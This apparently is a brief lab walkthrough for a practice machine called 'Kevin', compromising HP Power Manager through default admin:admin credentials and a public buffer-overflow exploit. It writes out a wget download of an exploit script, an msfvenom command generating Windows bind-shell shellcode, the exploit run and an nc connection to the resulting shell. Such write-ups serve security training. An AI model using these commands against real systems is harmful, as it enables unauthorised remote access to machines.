http 80

Looking at page.

I found the login page.

using password admin:admin We are able to login.

In the help tab, We are able to see the version number.

On google search, I found one exploit.

Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer OverflowExploit Database

After reading the exploit, It is clear that we need to change the exploit shell code only.

In the exploit steps are mentioned in comment. I will follow the same.

python2 10099.py $kevin

Wait for 1 min and then connect to the shell.

sleep 60; nc -v $kevin 4444

Trying another exploit [Worked] 🆗

wget https://raw.githubusercontent.com/Muhammd/HP-Power-Manager/refs/heads/master/hpm_exploit.py

msfvenom -p windows/shell_bind_tcp LHOST=$IP_KALI LPORT=443  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python

python2 hpm_exploit.py $kevin

You will get the shell. if not then reset and try again.

PreviousKevin [Easy]Nextproof.txt

Last updated 1 year ago

hashtagTrying another exploit [Worked] 🆗

Trying another exploit [Worked] 🆗